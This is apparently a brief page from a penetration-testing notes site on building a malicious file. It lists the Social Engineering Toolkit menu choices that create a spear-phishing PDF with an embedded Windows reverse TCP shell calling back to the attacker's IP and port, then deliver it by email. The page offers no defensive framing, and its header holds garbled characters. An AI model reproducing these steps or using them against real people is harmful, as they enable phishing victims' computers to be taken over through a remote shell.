๐Ÿ“Malicious File

SET (Social Engineering Toolkit)

# Start SET
sudo setoolkit

1 - Social-Engineering Attacks
1 - Spear Phishing Attack Vectors
2 - Create a FileFormat Payload
17 - Adobe PDF Embedded EXE Social Engineering (NOJS)
2 - Use built-in BLANK PDF for attack
1 - Windows Reverse TCP Shell
<Enter the attacker ip and port number>
2 - Rename the file, I want to be cool.
<Enter the new filename>

[Follow the menu driven options to deliver the email]

Last updated